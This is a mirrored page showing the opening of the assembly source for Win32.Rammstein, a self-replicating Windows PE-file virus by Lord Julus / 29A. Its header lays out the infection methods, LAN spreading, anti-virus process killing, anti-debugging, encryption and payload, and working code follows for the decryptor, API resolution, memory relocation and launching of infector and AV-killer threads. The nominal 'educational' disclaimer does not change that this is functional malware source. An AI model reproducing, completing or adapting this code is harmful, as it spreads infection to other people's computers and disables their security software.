mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
10505 lines
457 KiB
NASM
10505 lines
457 KiB
NASM
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RAMM.ASM]ÄÄÄ
|
||
comment $
|
||
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||
ÛÛß ßÛß ßÛß ßÛÛ
|
||
ÛÛ Û Û Û Û Û ÛÛ
|
||
ÛÛÛßßß ÜÛÜ Û ÛÛ
|
||
ÛÛ ßßßßÛßßßß Û Û ÛÛ
|
||
ÛÛ Û ÜÛ Û ÛÛ
|
||
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||
|
||
ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜ ÜÜÜ ÜÜÜ
|
||
Û ÜÜÜ Û Û ÜÜÜ Û Û Ü Ü Û Û Ü Ü Û Û ÜÜÜÜÛ ÜÛßÛÜ Û ÜÜÜÜÛ ÛÜ ÜÛ Û ßÛÛ Û
|
||
Û Ü ÜÜÛ Û ÜÜÜ Û Û Û Û Û Û Û Û Û ÛÜÜÜÜ Û ÛÜ ÜÛ Û ÜÜÜÛÜ ÜÛ ÛÜ Û ÛÜß Û
|
||
ÛÜÛÜÜÜÛ ÛÜÛ ÛÜÛ ÛÜÛßÛÜÛ ÛÜÛßÛÜÛ ÛÜÜÜÜÜÛ ßßß ÛÜÜÜÜÜÛ ÛÜÜÜÛ ÛÜÛßÛÜÛ
|
||
|
||
v4.0
|
||
|
||
= Final Release =
|
||
|
||
(c) Lord Julus / 29A (Nov 2000)
|
||
|
||
|
||
===================================================================
|
||
|
||
DISCLAIMER
|
||
|
||
This is the source code of a virus. Possesing, using, spreading of
|
||
this source code, compiling and linking it, possesing, using and
|
||
spreading of the executable form is illegal and it is forbidden.
|
||
Should you do such a thing, the author may not be held responsible
|
||
for any damage that occured from the use of this source code. The
|
||
actual purpose of this source code is for educational purposes and
|
||
as an object of study. This source code comes as is and the author
|
||
cannot be held responsible for the existance of other modified
|
||
variants of this code.
|
||
|
||
====================================================================
|
||
|
||
History:
|
||
|
||
09 Sep 2000 - Today I made a small improvement. When the dropper roams
|
||
the net onto another computer it remains in the windows
|
||
dir and it represents a weak point which might be noticed
|
||
by an av. So, now, the virus will smartly remove either
|
||
the dropper or the entry in the win.ini file if one of
|
||
them is missing. If both are there, they are left alone
|
||
because they will remove eachother. Added Pstores.exe to
|
||
the black list. Thanks to Evul for pointing me out that
|
||
it is a rather peculiar file and cannot be safely
|
||
infected.
|
||
|
||
22 Jul 2000 - The virus has moved up to version 4.0. Today I added
|
||
the network infector. It comes in a separate thread.
|
||
For the moment looks like everything works fine. Will
|
||
add a timer to it so that it does not hang in huge
|
||
networks... Virus is above 13k now... Waiting for the
|
||
LZ!
|
||
|
||
18 Jul 2000 - Fixed a bug in the section increase algorithm: if you
|
||
want to have a good compatibility you NEED to place the
|
||
viral code exactly at the end of file and NOT at the
|
||
end of the VirtualSize or SizeOfRawData as it appears
|
||
in the section header, because many files get their
|
||
real size calculated at load time in some way.
|
||
HURRAY!!! YES!! I fixed a shitty bug! If you do section
|
||
add you MUST check also if any directory VA follows
|
||
immediately the last section header so that you will
|
||
not overwrite it. Now almost all files work ok under
|
||
NT!!!! However, I don't seem to be able to make
|
||
outlook.exe get infected so I put it on the black list.
|
||
The other MsOffice executables get infected correctly
|
||
on both Win9x and WinNT.
|
||
|
||
17 Jul 2000 - Have started some optimizations and proceduralizations
|
||
(;-)))). The virus is quickly going towards 13k so I
|
||
am quite anxious to implement my new LZ routine to
|
||
decrease it's size. I fixed a bug: WinNT NEEDS the
|
||
size of headers value to be aligned to file alignment.
|
||
|
||
14 Jul 2000 - Worked heavily on the WindowsNT compatibility. In this
|
||
way I was able to spot 2 bugs in the infection routine,
|
||
one regarding RVA of the new section and one regarding
|
||
the situation when the imports cannot be found by the api
|
||
hooker. Still thinking if I should rearrange relocs also?
|
||
Now files are loaded under WindowsNT (NT image is correct)
|
||
but they cannot fully initialize. Will research some
|
||
more.
|
||
|
||
03 Jun 2000 - Added an encryption layer with no key, just a rol/ror
|
||
routine on parity. Also added some MMX commands. Fixed
|
||
a few things.
|
||
|
||
22 May 2000 - Added EPO on files that have the viral code outside the
|
||
code section. Basically from now on the entry point stays
|
||
only into the code section. The epo is not actually epo,
|
||
because as I started to code it I decided to make it very
|
||
complicated so I will include the complicated part in the
|
||
next release. It will be the so called LJILE32 <Lord
|
||
Julus' Instruction Length Engine 32>. This engine will
|
||
allow me to have an exact location of the opcode for each
|
||
instruction so we will be able to look up any call, jump
|
||
or conditional jump to place our code call there. So for
|
||
this version only a jump at the original eip.
|
||
|
||
21 May 2000 - Fixed a bug in the api hooker... I forgot that some import
|
||
sections have a null pointer to names. Also added the
|
||
infection by last section increase for files who cannot
|
||
be infected otherwise. All files should be touched now.
|
||
Also I fixed the problem with the payload window not
|
||
closing after the process closed. I solved half of it
|
||
as some files like wordpad.exe still have this problem.
|
||
|
||
20 May 2000 - Prizzy helped me a lot by pointing out to me that in
|
||
order to have the copro working ok I need to save it's
|
||
environment so that the data of the victim process in
|
||
not altered. thanx!! Also fixed the cpuid read.
|
||
|
||
14 May 2000 - Released first beta version to be tested
|
||
|
||
====================================================================
|
||
Virus Name ........... Win32.Rammstein
|
||
Virus Version ........ 4.0
|
||
Virus Size ........... 14002 (debug), 15176 (release)
|
||
Virus Author ......... Lord Julus / 29A
|
||
Release Date ......... 30 Nov 2000
|
||
Virus type ........... PE infector
|
||
Target OS ............ Win95, Win98, WinNT, Win2000
|
||
Target Files ......... many PE file types:
|
||
EXE COM ACM CPL HDI OCX PCI
|
||
QTC SCR X32 CNV FMT OCM OLB WPC
|
||
Append Method ........ The virus will check wether there is enough room
|
||
for it inside the code section. If there is not
|
||
enough room the virus will be placed at end. If
|
||
there is it will be inserted inside the code
|
||
section at a random offset while the original
|
||
code will be saved at end. The placing at the end
|
||
has also two variants. If the last section is
|
||
Resources or Relocations the virus will insert a
|
||
new section before the last section and place the
|
||
data there, also rearranging the last section's
|
||
RVAs. If the last section is another section a
|
||
new section will be placed at end. The name of
|
||
the new section is a common section name which is
|
||
choosed based on the existing names so that it
|
||
does not repeat. If the virus is placed at the
|
||
end just a small EPO code is used so that the eip
|
||
stays inside the code section.
|
||
A special situation occurs if there is no enough
|
||
space to add a new section header, for example
|
||
when the code section starts at RVA 200 (end of
|
||
headers). In this situation the virus will
|
||
increase the last section in order to append.
|
||
Infect Methods ....... -Direct file attacks: the virus will attack
|
||
specific files in the windows directory, files
|
||
which are most used by people
|
||
-Directory scan: all files in the current
|
||
directory will be infected, as well as 3 files in
|
||
the system directory and 3 in the windows
|
||
directory
|
||
-Api hooking (per-process residency): the virus
|
||
hooks a few api calls and infects files as the
|
||
victim uses the apis
|
||
-Intranet spreading: the virus spreads into the
|
||
LAN using only windows apis
|
||
Features ............. Multiple threads: the virus launches a main
|
||
thread. While this thread executes, in the same
|
||
time, the original thread returns to host, so no
|
||
slowing down appears. The main viral thread
|
||
launches other 6 threads and monitors their
|
||
execution. If one of the threads is not able to
|
||
finish the system is hanged because it means
|
||
somebody tryied to patch some of the thread code.
|
||
Heavy anti-debugging: i tried to use almost all
|
||
the anti-debug and anti-emulation stuff that I
|
||
know
|
||
FPU: uses fpu instructions
|
||
Crc32 search: uses crc32 to avoid waste of space
|
||
Memory roaming: allocates virtual memory and
|
||
jumps in it
|
||
Interlaced code: this means that some threads
|
||
share the same piece of code and the virus is
|
||
careful to let only one in the same time
|
||
otherwise we get some of the variables distroyed.
|
||
Preety hard to be emulated by avs.
|
||
Also features semaphores, timers
|
||
Marks infection using the Pythagoreic numbers.
|
||
SEH: the virus creates 9 SEH handlers, for each
|
||
thread and for the main thread.
|
||
(*) Polymorphic .......... Yes (2 engines: Modularis, LJFPE32)
|
||
(*) Metamorphic .......... Yes (mild custom metamorphic engine)
|
||
Encrypted ............ Yes
|
||
Safety ............... Yes (avoids infecting many files)
|
||
Kill AV Processes .... Yes
|
||
Payload .............. On 14th every even month the infected process
|
||
will launch a thread that will display random
|
||
windows with some of the Rammstein's lyrics.
|
||
Pretty annoying... Probably this is the first
|
||
virus that actually creates real windows and
|
||
processes their messages. The windows shut down
|
||
as the victim process closes.
|
||
|
||
|
||
(*) Feature not included in this version.
|
||
|
||
Debug notes: please note that this source code features many ways of
|
||
debugging. You may turn on and off most of the virus's features by
|
||
turning some variables to TRUE or FALSE.
|
||
====================================================================
|
||
|
||
$
|
||
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
.586p ;
|
||
.model flat, stdcall ;
|
||
;
|
||
extrn MessageBoxA:proc ;
|
||
extrn ExitProcess: proc ;
|
||
;
|
||
TRUE = 1 ;
|
||
FALSE = 0 ;
|
||
DEBUG = TRUE ;debug on?
|
||
ANTIEMU = TRUE ;anti-debuggin/emulation?
|
||
JUMP = TRUE ;allocate and jump in mem?
|
||
DIRECT = TRUE ;direct action?
|
||
ANTIAV = TRUE ;anti-av feature?
|
||
APIHOOK = TRUE ;hook imported apis?
|
||
MAINTHREAD = TRUE ;launch a main thread?
|
||
PAYLOAD = TRUE ;use payload?
|
||
RANDOMIZE_ENTRY = TRUE ;randomize code sec entry?
|
||
EPO = TRUE ;Use EPO
|
||
MMX = FALSE ;
|
||
NETWORKINFECTION = TRUE ;
|
||
VIRUSNOTIFYENTRY = FALSE ;msgbox at virus start?
|
||
VIRUSNOTIFYEXIT = FALSE ;msgbox at virus end?
|
||
VIRUSNOTIFYHOOK = FALSE ;
|
||
MAINTHREADSEH = TRUE ;
|
||
THREAD1SEH = TRUE ;
|
||
THREAD2SEH = TRUE ;
|
||
THREAD3SEH = TRUE ;
|
||
THREAD4SEH = FALSE ;
|
||
THREAD5SEH = FALSE ;
|
||
THREAD6SEH = TRUE ;
|
||
CHECKSUM = TRUE ;
|
||
WE_ARE_LAST = 0 ;
|
||
RELOCATIONS_LAST = 1 ;
|
||
RESOURCES_LAST = 2 ;
|
||
NOT_AVAILABLE = 0 ;
|
||
AVAILABLE = 1 ;
|
||
METHOD_MOVE_CODE = 0 ;
|
||
METHOD_APPEND_AT_END = 1 ;
|
||
METHOD_INCREASE_LAST = 2 ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
IF MMX ;
|
||
include mmx.inc ; MMX !
|
||
ENDIF ;
|
||
;
|
||
@endsz macro ;locate end of asciiz
|
||
local nextchar ;string
|
||
;
|
||
nextchar: ;
|
||
lodsb ;
|
||
test al, al ;
|
||
jnz nextchar ;
|
||
endm ;
|
||
;
|
||
include w32nt_lj.inc ;
|
||
include w32us_lj.inc ;
|
||
;
|
||
; Credits to jp, vecna, prizzy ;calculate crc32
|
||
mCRC32 equ 0C1A7F39Ah ;
|
||
mCRC32_init equ 09C3B248Eh ;
|
||
crc32 macro string ;
|
||
crcReg = mCRC32_init ;
|
||
irpc _x,<string> ;
|
||
ctrlByte = '&_x&' xor (crcReg and 0FFh)
|
||
crcReg = crcReg shr 8 ;
|
||
rept 8 ;
|
||
ctrlByte = (ctrlByte shr 1) xor (mCRC32 * (ctrlByte and 1))
|
||
endm ;
|
||
crcReg = crcReg xor ctrlByte ;
|
||
endm ;
|
||
dd crcReg ;
|
||
endm ;
|
||
;
|
||
noter macro string ;this NOTs a string
|
||
irpc _x,<string> ;
|
||
notbyte = not('&_x&') ;
|
||
db notbyte ;
|
||
endm ;
|
||
db not(0) ;
|
||
endm ;
|
||
;
|
||
PUSH_POP STRUCT ;
|
||
pop_edi dd ? ;helps us to pop stuff...
|
||
pop_esi dd ? ;
|
||
pop_ebp dd ? ;
|
||
pop_esp dd ? ;
|
||
pop_ebx dd ? ;
|
||
pop_edx dd ? ;
|
||
pop_ecx dd ? ;
|
||
pop_eax dd ? ;
|
||
PUSH_POP ENDS ;
|
||
;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
.data ;
|
||
db 0 ;
|
||
;
|
||
.code ;
|
||
;
|
||
start: ;
|
||
IF DEBUG ;
|
||
jmp xxx ;
|
||
debug_start db 'Here is the start of the virus.',0 ;Really!! ;-)
|
||
xxx: ;
|
||
ENDIF ;
|
||
pushad ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
call getdelta ; Get the delta handle
|
||
;
|
||
getdelta: ;
|
||
pop ebp ;
|
||
sub ebp, offset getdelta ;
|
||
or ebp, ebp ;check if first gen
|
||
jnz no_first ;
|
||
mov [ebp+firstgen], 1 ;mark the first generation
|
||
jmp get_base ;
|
||
;
|
||
no_first: ;
|
||
mov [ebp+firstgen], 0 ;
|
||
;
|
||
get_base: ;
|
||
call getimagebase ; And the imagebase...
|
||
;
|
||
getimagebase: ;
|
||
pop eax ;
|
||
;
|
||
ourpoint: ;
|
||
sub eax, 1000h+(ourpoint-start)-1 ;before this eax equals
|
||
;imagebase+RVA(ourpoint)+
|
||
;RVA(code section)
|
||
;
|
||
mov dword ptr [ebp+imagebase], eax ;
|
||
mov dword ptr [ebp+ourimagebase], eax ;
|
||
jmp over_data ;
|
||
;
|
||
imagebase dd 00400000h ;
|
||
ourimagebase dd 0 ;
|
||
firstgen dd 0 ;
|
||
;
|
||
over_data: ;
|
||
cmp [ebp+firstgen], 1 ;
|
||
je EncryptedArea ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
call DecryptOffset ;very light internal
|
||
;decrypt module
|
||
DecryptOffset: ;no key, just ror/rol
|
||
pop esi ;
|
||
add esi, (EncryptedArea - DecryptOffset) ;
|
||
mov edi, esi ;
|
||
mov ecx, (end2-EncryptedArea) ;
|
||
;
|
||
DecryptLoop: ;
|
||
lodsb ;
|
||
mov ebx, ecx ;
|
||
inc bl ;
|
||
jp parity ;
|
||
ror al, cl ;
|
||
jmp do_decrypt ;
|
||
;
|
||
parity: ;
|
||
rol al, cl ;
|
||
;
|
||
do_decrypt: ;
|
||
stosb ;
|
||
loop DecryptLoop ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
EncryptedArea: ;
|
||
mov [ebp+delta], ebp ;save additional deltas
|
||
IF ANTIEMU ;
|
||
mov [ebp+delta2], ebp ;
|
||
ENDIF ;
|
||
mov eax, [ebp+imagebase] ;
|
||
mov dword ptr [ebp+adjust], eax ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
lea eax, [ebp+ExceptionExit] ; Setup a SEH frame
|
||
push eax ;
|
||
push dword ptr fs:[0] ;
|
||
mov fs:[0], esp ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
mov [ebp+copying], 0 ;reset our syncronization
|
||
mov [ebp+in_list], 0 ;variables
|
||
mov [ebp+free_routine], AVAILABLE ;
|
||
mov [ebp+crt_dir_flag], 3 ;
|
||
mov [ebp+apihookfinish], 0 ;
|
||
;
|
||
lea esi, [ebp+module_names] ;decrypt module names
|
||
mov ecx, module_names_length ;
|
||
call not_list ;
|
||
;
|
||
mov eax, [esp+28h] ;first let's locate the
|
||
lea edx, [ebp+kernel32_name] ;kernel32 base address
|
||
call LocateKernel32 ;
|
||
jc ReturnToHost ;
|
||
mov dword ptr [ebp+k32], eax ;
|
||
lea esi, dword ptr [ebp+kernel32apis] ;
|
||
lea edx, dword ptr [ebp+kernel32addr] ;
|
||
mov ecx, kernel32func ;
|
||
call LocateApis ;and kernel32 apis
|
||
jc ReturnToHost ;
|
||
;
|
||
lea edi, dword ptr [ebp+advapi32_name] ;locate advapi32
|
||
call LocateModuleBase ;
|
||
jc ReturnToHost ;
|
||
mov dword ptr [ebp+a32], eax ;
|
||
lea esi, dword ptr [ebp+advapi32apis] ;
|
||
lea edx, dword ptr [ebp+advapi32addr] ;
|
||
mov ecx, advapi32func ;
|
||
call LocateApis ;and the apis
|
||
jc ReturnToHost ;
|
||
;
|
||
lea edi, dword ptr [ebp+user32_name] ;locate user32
|
||
call LocateModuleBase ;
|
||
jc ReturnToHost ;
|
||
mov dword ptr [ebp+u32], eax ;
|
||
lea esi, dword ptr [ebp+user32apis] ;
|
||
lea edx, dword ptr [ebp+user32addr] ;
|
||
mov ecx, user32func ;
|
||
call LocateApis ;and it's apis
|
||
jc ReturnToHost ;
|
||
;
|
||
lea edi, dword ptr [ebp+gdi32_name] ;locate gdi32
|
||
call LocateModuleBase ;
|
||
jc ReturnToHost ;
|
||
mov dword ptr [ebp+g32], eax ;
|
||
lea esi, dword ptr [ebp+gdi32apis] ;
|
||
lea edx, dword ptr [ebp+gdi32addr] ;
|
||
mov ecx, gdi32func ;
|
||
call LocateApis ;and it's apis
|
||
jc ReturnToHost ;
|
||
;
|
||
lea edi, dword ptr [ebp+mpr32_name] ;locate mpr32
|
||
call LocateModuleBase ;
|
||
jc NoNetworkApis ;
|
||
mov dword ptr [ebp+m32], eax ;
|
||
lea esi, dword ptr [ebp+mpr32apis] ;
|
||
lea edx, dword ptr [ebp+mpr32addr] ;
|
||
mov ecx, mpr32func ;
|
||
call LocateApis ;and it's apis
|
||
jc NoNetworkApis ;
|
||
;
|
||
mov [ebp+netapis], TRUE ;
|
||
jmp get_img ;
|
||
;
|
||
NoNetworkApis: ;
|
||
mov [ebp+netapis], FALSE ;
|
||
;
|
||
get_img: ;
|
||
lea edi, dword ptr [ebp+img32_name] ;locate and save
|
||
call LocateModuleBase ;the checksum procedure
|
||
jc no_image ;
|
||
call @checksum ;
|
||
db "CheckSumMappedFile", 0 ;
|
||
@checksum: ;
|
||
push eax ;
|
||
call [ebp+_GetProcAddress] ;
|
||
mov [ebp+checksumfile], eax ;
|
||
;
|
||
no_image: ;
|
||
lea esi, [ebp+module_names] ;recrypt names
|
||
mov ecx, module_names_length ;
|
||
call not_list ;
|
||
;
|
||
IF VIRUSNOTIFYENTRY ;
|
||
push 0 ;
|
||
call entrytext1 ;
|
||
db 'Rammstein viral code start!', 0 ;
|
||
entrytext1: ;
|
||
call entrytext2 ;
|
||
db 'Rammstein viral code start!', 0 ;
|
||
entrytext2: ;
|
||
push 0 ;
|
||
call [ebp+_MessageBoxA] ;
|
||
ENDIF ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
call smash_dropper ;kill dropper
|
||
call getversion ;get the windoze version
|
||
;
|
||
WindowsVersion OSVERSIONINFOA <SIZE OSVERSIONINFOA>;
|
||
;
|
||
getversion: ;
|
||
call [ebp+_GetVersionExA] ;
|
||
mov byte ptr [ebp+version], al ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
mov [ebp+skipper], 0 ;
|
||
IF MMX ;
|
||
pushfd ;push flags
|
||
pop eax ;get flags
|
||
bt eax, 21h ;test for mmx presence
|
||
jnc no_mmx_present ;
|
||
mov [ebp+mmx], TRUE ;set it!
|
||
jmp done_mmx ;
|
||
;
|
||
no_mmx_present: ;
|
||
mov [ebp+mmx], FALSE ;
|
||
;
|
||
done_mmx: ;
|
||
ENDIF ;
|
||
IF JUMP ;allocate some more
|
||
;
|
||
cmp [ebp+method], METHOD_MOVE_CODE ;if code is not moved
|
||
jne restore_epo ;skip memory jump
|
||
;
|
||
call [ebp+_VirtualAlloc], 0, virussize+1000h, MEM_COMMIT+MEM_RESERVE,\
|
||
PAGE_EXECUTE_READWRITE
|
||
or eax, eax ;memory
|
||
jnz no_memory_error ;
|
||
;
|
||
call fatalexit ;we cannot continue...
|
||
db "Not enough memory!", 0 ;
|
||
;
|
||
fatalexit: ;if an error occurs, then
|
||
push 0 ;simulate a fatal exit
|
||
call [ebp+_FatalAppExitA] ;
|
||
;
|
||
no_memory_error: ;
|
||
mov [ebp+memory], eax ;otherwise copy the
|
||
lea esi, [ebp+start] ;virus to memory and
|
||
mov edi, eax ;
|
||
mov ecx, virussize ;
|
||
rep movsb ;
|
||
add eax, offset resident_area - offset start;
|
||
push eax ;
|
||
ret ;continue there...
|
||
;
|
||
restore_epo: ;
|
||
IF EPO ;
|
||
mov edi, [ebp+addressofentrypoint] ;restore epo
|
||
add edi, [ebp+imagebase] ;
|
||
lea esi, [ebp+saved_code] ;
|
||
lodsd ;
|
||
stosd ;
|
||
lodsd ;
|
||
stosd ;
|
||
ENDIF ;
|
||
;
|
||
resident_area: ;
|
||
call getdelta2 ;get delta again...
|
||
;
|
||
getdelta2: ;
|
||
pop ebp ;
|
||
sub ebp, offset getdelta2 ;
|
||
mov [ebp+delta], ebp ;
|
||
IF ANTIEMU ;
|
||
mov [ebp+delta2], ebp ;
|
||
ENDIF ;
|
||
;
|
||
cmp [ebp+firstgen], 1 ;
|
||
je grunge ;
|
||
;
|
||
cmp [ebp+method], METHOD_MOVE_CODE ;check the method
|
||
jne second_method ;
|
||
;
|
||
mov esi, [ebp+codesource] ;if here, we must move
|
||
mov edi, [ebp+codedestin] ;some code back to where
|
||
add esi, [ebp+imagebase] ;it belongs...
|
||
add edi, [ebp+imagebase] ;
|
||
mov ecx, virussize ;
|
||
rep movsb ;
|
||
;
|
||
second_method: ;
|
||
;
|
||
grunge: ;
|
||
ENDIF ;
|
||
IF MAINTHREAD ;now we launch the main
|
||
lea ebx, [ebp+mainthreadid] ;thread
|
||
lea eax, [ebp+MainThread] ;
|
||
call [ebp+_CreateThread], 0, 0, eax, ebp, 0, ebx;
|
||
cmp [ebp+firstgen], 1 ;if it is the first gen
|
||
jne do_return ;than wait for it to
|
||
call [ebp+_WaitForSingleObject], eax, INFINITE ;finish
|
||
;
|
||
do_return: ;otherwise, return to host
|
||
jmp ReturnToHost ;here...
|
||
ENDIF ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
MainThread proc ;
|
||
call @MainThreadDelta ;for our main thread get
|
||
@MainThreadDelta: ;the delta handle again
|
||
pop ebp ;
|
||
sub ebp, offset @MainThreadDelta ;
|
||
;
|
||
IF MAINTHREADSEH ;
|
||
lea eax, [ebp+MainExceptionExit] ; Setup a SEH frame
|
||
push eax ;
|
||
push dword ptr fs:[0] ;
|
||
mov fs:[0], esp ;
|
||
;
|
||
no_main_seh: ;
|
||
ENDIF ;
|
||
lea edx, [ebp+OurThreads] ;Prepare to create the
|
||
lea ebx, [ebp+OurThreadIds] ;threads...
|
||
lea edi, [ebp+OurThreadHandles] ;
|
||
mov ecx, 6 ;
|
||
;
|
||
create_loop: ;
|
||
mov eax, [edx] ;
|
||
add eax, ebp ;
|
||
call StartThread ;start them and set
|
||
add edx, 4 ;them
|
||
add ebx, 4 ;
|
||
add edi, 4 ;
|
||
loop create_loop ;
|
||
;
|
||
cmp [ebp+no_imports], TRUE ;
|
||
jne no_per_process_skip ;
|
||
mov [ebp+skipper], 1 ;
|
||
;
|
||
no_per_process_skip: ;
|
||
lea eax, [ebp+offset Semaphore] ;now prepare a semaphore
|
||
push eax ;to monitor their
|
||
push 31 ;execution
|
||
push 0 ;
|
||
push 0 ;
|
||
call [ebp+_CreateSemaphoreA] ;
|
||
mov [ebp+hsemaphore], eax ;
|
||
;
|
||
lea edi, [ebp+OurThreadHandles] ;and now start them...
|
||
mov ecx, 6 ;
|
||
;
|
||
resume_loop: ;
|
||
push ecx ;
|
||
push dword ptr [edi] ;
|
||
call [ebp+_ResumeThread] ;resume!
|
||
add edi, 4 ;
|
||
pop ecx ;
|
||
loop resume_loop ;
|
||
;
|
||
push FALSE ;Wait forever until all
|
||
push INFINITE ;threads finish...
|
||
push TRUE ;(if the mainthread is
|
||
lea eax, [ebp+offset OurThreadHandles] ;TRUE, by this time the
|
||
push eax ;host is already running
|
||
push 6 ;in parallel with this
|
||
call [ebp+_WaitForMultipleObjectsEx] ;thread)
|
||
;
|
||
lea eax, [ebp+test_semaphore] ;now get the last count
|
||
push eax ;of the semaphore...
|
||
push 1 ;Should be 6*5...
|
||
push [ebp+hsemaphore] ;
|
||
call [ebp+_ReleaseSemaphore] ;
|
||
;
|
||
push [ebp+hsemaphore] ;close semaphore
|
||
call [ebp+_CloseHandle] ;
|
||
;
|
||
mov eax, [ebp+test_semaphore] ;now get the value
|
||
mov ebx, offset where_to - offset jump ;calculate jump offset
|
||
sub ebx, 30 ;5*6
|
||
add eax, ebx ;and make a jump with it
|
||
add eax, offset jump ;If the value is smaller
|
||
add eax, ebp ;
|
||
jump: jmp eax ;then it should
|
||
jmp jump ;mean someone fucked with
|
||
jmp jump ;our threads and probably
|
||
jmp jump ;the execution falls here
|
||
jmp jump ;where it hangs... This
|
||
jmp jump ;will give the user the
|
||
jmp jump ;impression that he played
|
||
jmp jump ;with hot stuff...
|
||
;
|
||
where_to: ;
|
||
IF MAINTHREAD ;if we have a mainthread
|
||
db 0E9h ;we must kill it...
|
||
dd offset KillThread - $-4 ;
|
||
ELSE ;
|
||
db 0E9h ;otherwise, simply return
|
||
dd offset ReturnToHost - $-4 ;to host...
|
||
ENDIF ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
StartThread: ;
|
||
pusha ;here we create threads
|
||
call [ebp+_CreateThread], 0, 0, eax, ebp, CREATE_SUSPENDED, ebx
|
||
mov [edi], eax ;
|
||
push THREAD_PRIORITY_HIGHEST ;and set their priority
|
||
push dword ptr [ebx] ;
|
||
call [ebp+_SetThreadPriority] ;
|
||
popa ;
|
||
db 0c3h ;ret
|
||
ret ;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
OurThreadIds: ;
|
||
Thread_1_id dd 0 ;Direct infector
|
||
Thread_2_id dd 0 ;Directory infector
|
||
Thread_3_id dd 0 ;AV killed
|
||
Thread_4_id dd 0 ;Anti-debugging
|
||
Thread_5_id dd 0 ;Api hooker
|
||
Thread_6_id dd 0 ;Network infector
|
||
;
|
||
OurThreadHandles: ;
|
||
Thread_1_handle dd 0 ;
|
||
Thread_2_handle dd 0 ;
|
||
Thread_3_handle dd 0 ;
|
||
Thread_4_handle dd 0 ;
|
||
Thread_5_handle dd 0 ;
|
||
Thread_6_handle dd 0 ;
|
||
hsemaphore dd 0 ;
|
||
